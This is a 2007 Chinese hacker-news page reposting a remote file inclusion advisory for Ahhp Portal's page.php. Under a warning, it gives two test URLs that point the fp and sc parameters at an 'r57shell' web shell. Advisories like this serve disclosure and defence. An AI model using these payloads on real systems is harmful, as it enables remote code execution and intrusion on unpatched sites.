黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图
您现在的位置: 黑客风云 >> 黑客新闻 >> 漏洞公告 >> 新闻正文
[推荐]Ahhp Portal Page.PHP远程文件包含漏洞
        ★★★★★
Ahhp Portal Page.PHP远程文件包含漏洞
新闻整理发布:黑客风云 新闻来源:www.05112.com 更新时间:2007-5-6
 
影响版本: 
Ahhp-Portal  
详细说明: 
Ahhp Portal是一款基于PHP的WEB应用程序。 

Ahhp Portal不正确过滤用户提交的输入,远程攻击者可以利用漏洞以WEB权限执行任意命令。 

问题是’Page.PHP’脚本对用户提交的WEB参数缺少过滤,指定远程服务器上的文件作为包含参数,可导致以WEB权限执行任意命令。 


参考: 
漏洞提供者 
CodeXpLoder’tq 
解决方案: 
目前没有解决方案提供: 

http://www.ahhope.org/ 
测试方法: 

[警 告] 

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负! 

http://www.example.com/page.php?fp=r57shell? 
http://www.example.com/page.php?sc=r57shell?  
//Sebug.net  
新闻录入:liult    责任编辑:liult 
  • 上一篇新闻:

  • 下一篇新闻:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    抽根憋闷烟的心声
    学习网页制作的理由
    加入终身会员的理由!!!
    学习黑客编程的5大理由
    学习免杀的6大理由
    学习软件破解的理由
    会员账号开通查询
    常见问题解答
    汇款向导
    学员报名咨询
    最 新 热 门
    黑客风云大型免费语音团课04-07
    投稿有大奖!!越投奖越多!!09-07
    “黑炸弹”病毒来袭 能删除硬盘文05-06
    雅虎将关闭相册服务 为Flickr让路05-06
    每日计算机病毒及木马播报05-06
    DMCMS Upload_File.PHP任意文件上05-06
    Ahhp Portal Page.PHP远程文件包05-06
    Comus Accept.PHP远程文件包含漏05-06
    当心骗子用网监的名义来欺骗站长05-06
    注意西游木马QQ助手下载器05-06
    相 关 文 章
  • “黑炸弹”病毒来袭 能删除硬盘文件

  • DMCMS Upload_File.PHP任意文件上传漏

  • Comus Accept.PHP远程文件包含漏洞

  • 微软发布安全公告,重点修补DNS零日漏

  • Photoshop曝高危漏洞 恶意代码被公开

  • 注重安全改进 微软将推出Office 2003

  • Asterisk SIP T.38 SDP解析存在多个远

  • Adobe Photoshop多个文件格式存在缓冲

  • Novell eDirectory NCP功能碎片长度拒

  • Mac OS存严重漏洞 IE7和Firefox深受影

    • Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886